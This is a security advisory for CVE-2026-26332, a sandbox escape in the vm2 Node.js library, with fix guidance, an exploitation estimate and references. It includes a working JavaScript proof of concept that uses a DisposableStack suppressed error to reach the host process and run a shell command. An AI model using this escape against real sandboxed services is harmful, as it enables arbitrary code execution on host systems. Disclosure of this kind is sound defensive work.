CVE-2026-26332

Description

In vm2 v3.10.4 on Node.js v24.13.0, `SuppressedError` allows attackers to escape the sandbox and run arbitrary code. ### PoC ```js const { VM } = require("vm2"); const vm = new VM(); vm.run(` const ds = new DisposableStack(); ds.defer(() => { throw null; }); ds.defer(() => { const e = Error(); e.name = Symbol(); e.stack; }); try { ds.dispose(); } catch(e) { const Function = e.suppressed.constructor.constructor; const process = new Function("return process;")(); const { execSync } = process.mainModule.require("node:child_process"); execSync("echo pwned", { stdio: "inherit" }); } `); ```

How to fix CVE-2026-26332

To remediate CVE-2026-26332, upgrade the affected package to a fixed version below.

• —upgrade to 3.11.0 or later

Is CVE-2026-26332 being exploited?

Low — EPSS is 0.1%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

• from 0, < 3.11.0

CVSS scores

References (9)

• ADVISORYnvd.nist.gov/vuln/detail/CVE-2026-26332
• PATCHgithub.com/patriksimek/vm2
• WEBgithub.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0
• WEBgithub.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f